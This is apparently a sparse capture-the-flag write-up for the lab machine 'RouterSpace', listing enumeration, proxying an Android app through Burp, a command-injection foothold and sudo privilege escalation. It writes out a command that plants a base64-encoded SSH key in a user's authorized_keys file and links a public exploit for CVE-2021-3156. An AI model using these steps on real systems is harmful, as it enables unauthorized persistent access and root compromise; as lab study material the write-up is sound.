kedaegan.github.io

RouterSpace

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Homepage

Downloaded RouterSpace.apk
Set up Anbox for emulating Android
https://chennylmf.medium.com/how-to-install-anbox-on-kali-linux-2022-1-40d40cb77d9d
Installed app and set up proxy:
Proxy setup: adb shell settings put global http_proxy 10.10.14.25:8080
Don't forget to have Burp listen on the interface

Hostname:

Initial Foothold

RCE in webrequest from Agent

Original Capture

Reflection:

System Command:

System Command 2:

Created authorized keys

echo -n 'c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDU3h3V0RVWC9RNjZSNjlMMUVvcyswNkpFbjJqUU1jQ0RzSmovdjlxWHRoTUpWYnRua09Pd05NZHJEWVIxTVJ5akg1VDhmd1ZLWTVRYmdRMGcvOEtSSEJkV3JEQkZoOUFtM0FEVmNYZFZiZ0xvMnUrMWtlMk04RE45MkRGOE1WMlpBbnpvUUR5S01EK2pSZjFESGF1ait3RVJmYytiRFVXbjZUT2dMYjBTbllmM01HZTZzZm9LMDVPc3FxVUxpbjR3RnZ5dnNYQ0RNSWFFOVBEKytoMXAvUEE1NEVSTkdtOWFiallEdnBFb0p1Y2Y5Y2poY2sxeU5JR0N4dTU2UThJKzZWWGRWbEtmVHByY2Nvc0I4RWhMS3ozY1VSZHAxdi9lRjl1enBJaGdoUDNoaUVGUUZ1REhMdTA3UXNhdE9aUUdFV2hZNXF4cy9vblllbEZLQ3hrZXFXQUhqMXAxbFEyemVQdzdUb1Z0UXQ3RnBjdGswRE9hWDBxS2NNZ1N2SHZMWGx6VGNvOXM4S3plb3htd3NaRWRDOFYxaXJYY0c3YXJmTmNlRHhPTjRHZnRLaFZvdzlXNS9SNHh1Um5yMnpVSUI0T08rMUQ0cDhPWFRkd2dzQkc1ZHprellZSFNIYjFMamxTVHNZL3NxWm9qK3kwSVhqbDBHOEIyNU9tTk5DZVU9IHJvZ3VlQGthbGk=' | base64 -d > /home/paul/.ssh/authorized_keys

User.txt Proof Screenshot

Privilege Escalation


CVE-2021-3156
https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_nss.py

Root Screenshot Here: